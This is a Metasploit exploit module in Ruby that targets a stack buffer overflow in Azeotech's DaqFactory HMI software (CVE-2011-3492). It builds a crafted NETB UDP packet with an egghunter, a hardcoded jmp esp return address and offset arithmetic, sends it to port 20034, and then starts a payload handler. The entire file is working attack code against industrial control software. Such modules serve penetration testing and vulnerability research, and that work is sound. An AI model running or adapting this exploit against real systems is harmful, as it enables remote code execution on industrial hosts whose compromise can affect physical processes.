1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10
  include Msf::Exploit::Remote::Egghunter
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'DaqFactory HMI NETB Request Overflow',
17
        'Description' => %q{
18
          This module exploits a stack buffer overflow in Azeotech's DaqFactory
19
          product. The specific vulnerability is triggered when sending a specially crafted
20
          'NETB' request to port 20034. Exploitation of this vulnerability may take a few
21
          seconds due to the use of egghunter.  This vulnerability was one of the 14
22
          releases discovered by researcher Luigi Auriemma.
23
        },
24
        'Author' => [
25
          'Luigi Auriemma', # Initial discovery, crash poc
26
          'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit
27
        ],
28
        'References' => [
29
          [ 'CVE', '2011-3492'],
30
          [ 'OSVDB', '75496'],
31
          [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
32
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01']
33
        ],
34
        'DefaultOptions' => {
35
          'EXITFUNC' => 'process',
36
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
37
        },
38
        'Payload' => {
39
          'Space' => 600,
40
          'BadChars' => "\x00",
41
        },
42
        'Platform' => 'win',
43
        'Targets' => [
44
          [
45
            'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
46
            {
47
              'Ret' => 0x100B9EDF, # jmp esp PEGRP32A.dll
48
              'Offset' => 636,
49
            }
50
          ],
51
        ],
52
        'DisclosureDate' => '2011-09-13',
53
        'DefaultTarget' => 0,
54
        'Notes' => {
55
          'Reliability' => UNKNOWN_RELIABILITY,
56
          'Stability' => UNKNOWN_STABILITY,
57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
58
        }
59
      )
60
    )
61

62
    register_options(
63
      [
64
        # Required for EIP offset
65
        OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
66
        Opt::RPORT(20034)
67
      ]
68
    )
69
  end
70

71
  def exploit
72
    connect_udp
73

74
    print_status("Trying target #{target.name}...")
75

76
    eggoptions = {
77
      :checksum => false,
78
      :eggtag => 'scar',
79
    }
80

81
    # Correct the offset according to the 2nd IP (DHCP) length
82
    iplen = datastore['DHCP'].length
83
    offset = 93 - iplen
84

85
    if offset >= 80
86
      pktoffset = offset - 80
87
      finaloffset = target['Offset'] - pktoffset
88
    elsif offset <= 79
89
      pktoffset = 80 - offset
90
      finaloffset = target['Offset'] + pktoffset
91
    end
92

93
    # springboard onto our unmodified payload
94
    p = Rex::Arch::X86.jmp(750) + payload.encoded
95
    hunter, egg = generate_egghunter(p, payload_badchars, eggoptions)
96

97
    sploit = "NETB" # NETB request overflow
98
    sploit << rand_text_alpha_upper(233)
99
    sploit << "\x00" # part of the packet structure
100
    sploit << rand_text_alpha_upper(offset) # include the offset for the DHCP address
101
    sploit << make_nops(2)
102
    sploit << hunter
103
    sploit << rand_text_alpha_upper(52 - hunter.length - 2)
104
    sploit << [target.ret].pack("V")
105
    sploit << rand_text_alpha_upper(12)
106
    sploit << Rex::Arch::X86.jmp_short(-70)
107
    sploit << egg
108
    # packetlen needs to be adjusted to a max of 0x400 as per advisory
109
    sploit << rand_text_alpha_upper(finaloffset - egg.length)
110

111
    # The use of rand_text_alpha_upper() ensures we always get the same length for the
112
    # first IP address.
113
    sploit[12, 4] = rand_text_alpha_upper(4)
114

115
    udp_sock.put(sploit)
116

117
    handler
118
    disconnect_udp
119
  end
120
end
121

122